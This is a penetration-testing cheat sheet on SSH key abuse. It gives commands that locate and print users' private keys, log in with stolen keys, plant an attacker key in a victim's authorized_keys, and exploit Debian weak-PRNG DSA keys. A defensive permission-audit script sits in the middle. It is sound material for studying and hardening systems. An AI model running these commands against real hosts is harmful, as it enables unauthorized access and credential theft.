SSH Key
The two main ways of exploiting SSH keys are the following:
Accessing readable private SSH keys and using them to authenticate
Accessing writable public key files (authorized_keys) and adding your own key to them in order to authenticate
Public and private keys are generally stored in one of the following locations:
/root/.ssh/
/home/user_name/.ssh/ (the user's home directory)
/etc/ssh/
the paths specified in the ssh_config or sshd_config configuration files
The following commands can be used to identify any existing public or private keys and their permissions:
ls -la /home /root /etc/ssh /home/*/.ssh/
locate id_rsa
locate id_dsa
find / -name id_rsa 2> /dev/null
find / -name id_dsa 2> /dev/null
find / -name authorized_keys 2> /dev/null
cat /home/*/.ssh/id_rsa
cat /home/*/.ssh/id_dsa
1. Readable Private Keys
The easiest way to exploit this is to copy the key over to a Kali host, through a Python simple HTTP server or another file-transfer technique, or by simply copying and pasting the contents of the file.
In order for the private key to be accepted by SSH, it must be readable and writable only by its owner; otherwise SSH will complain that the permissions are too open.
Use the following command to set the permissions on the copied private key:
chmod 600 key_name
Then connect with:
ssh -i key_name user_name@X.X.X.X
Note: when a service that exposes files (FTP, SMB, HTTP, etc.) is accessible, the common SSH key directories should be checked for readable private keys.
2. Writable Public Keys
If the authorized_keys file is writable by the current user, this can be exploited by adding additional authorized keys.
The easiest way to exploit this is to generate a new SSH key pair, add the public key to the file, and log in using the private key.
The ssh-keygen command line utility can be used to generate a new SSH key pair.
Then copy the contents of the new public key into the writable authorized_keys file on the victim:
In our machine: cat ~/.ssh/id_rsa.pub | xclip -selection c
Then in the victim machine: echo "[paste the copied public key]" >> /home/victim_username/.ssh/authorized_keys
This allows logging in to the server via SSH without having to specify a private key, since the generated key sits in the default ~/.ssh location.
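As an added example (not part of the original page), a POSIX shell audit that checks the two conditions above from the defender's side: private keys readable by other users, and authorized_keys files (or the .ssh directory itself) writable by other users. The helper names and the constructed sample directory are assumptions; the permission bits are read with GNU stat, falling back to BSD stat.

```shell
#!/bin/sh
# Added audit example (not from the original page): flags what sections 1 and 2
# describe, from the defender's side. Sample files below are constructed.

# Octal permission bits of a file (GNU stat, with BSD stat as a fallback).
perm_of() { stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"; }

# check_private_key FILE: 0 if group and other have no bits at all, 1 otherwise.
check_private_key() {
  case "$(perm_of "$1")" in
    *00) return 0 ;;
    *)   return 1 ;;
  esac
}

# check_not_writable PATH: 0 unless the group or other write bit (2) is set.
check_not_writable() {
  case "$(perm_of "$1")" in
    *[2367]?|*[2367]) return 1 ;;
    *)                return 0 ;;
  esac
}

# audit_ssh_dir DIR: prints one "INSECURE <reason> <path>" line per finding
# and returns 1 if anything was flagged, 0 if the directory is clean.
audit_ssh_dir() {
  bad=0
  check_not_writable "$1" || { echo "INSECURE dir-writable $1"; bad=1; }
  for k in "$1"/id_rsa "$1"/id_dsa "$1"/id_ecdsa "$1"/id_ed25519; do
    [ -f "$k" ] || continue
    check_private_key "$k" || { echo "INSECURE private-key-readable $k"; bad=1; }
  done
  [ ! -f "$1/authorized_keys" ] || check_not_writable "$1/authorized_keys" ||
    { echo "INSECURE authorized_keys-writable $1/authorized_keys"; bad=1; }
  return $bad
}

# make_demo_dir: constructed .ssh directory with one good and two bad files;
# prints its path. The "key" contents are placeholder text, not real keys.
make_demo_dir() {
  d=$(mktemp -d)/.ssh && mkdir -m 700 "$d"
  printf 'PLACEHOLDER\n' > "$d/id_rsa";     chmod 644 "$d/id_rsa"      # readable by everyone
  printf 'PLACEHOLDER\n' > "$d/id_ed25519"; chmod 600 "$d/id_ed25519"  # correct
  printf 'ssh-ed25519 PLACEHOLDER user@host\n' > "$d/authorized_keys"
  chmod 666 "$d/authorized_keys"                                       # writable by everyone
  echo "$d"
}

demo=$(make_demo_dir)
audit_ssh_dir "$demo" || echo "audit of $demo found problems"
```

Run it against each real home directory's .ssh as root (e.g. from a cron job) to catch the same two weaknesses before an attacker does; a nonzero exit means something was flagged.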
3. SSH Key Predictable PRNG (Authorized_Keys) Process
This module describes how to attempt to use an obtained authorized_keys file against a host system.
Needed: the ssh-dss string from the authorized_keys file
Steps:
Get the authorized_keys file.
An example of this file would look like so:
ssh-dss AAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ...
Since this is an ssh-dss key, which current OpenSSH releases disable by default, we need to re-enable it in our local copy of /etc/ssh/ssh_config and /etc/ssh/sshd_config:
echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config
echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshd_config
/etc/init.d/ssh restart
Get g0tmi1k's debian-ssh repository and unpack the keys:
git clone https://github.com/g0tmi1k/debian-ssh
cd debian-ssh
tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz2
Grab the first 20 or 30 bytes of the key shown above, starting with the "AAAA..." portion, and grep the unpacked keys for it:
grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf'
dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub
If successful, this returns the matching public key file (68b329da9893e34099c7d8ad5cb9c940-17934.pub). To connect with the corresponding private key, drop the '.pub' extension and run:
ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934
You should connect without being asked for a password. If stuck, the -vvv verbosity should provide enough detail as to why.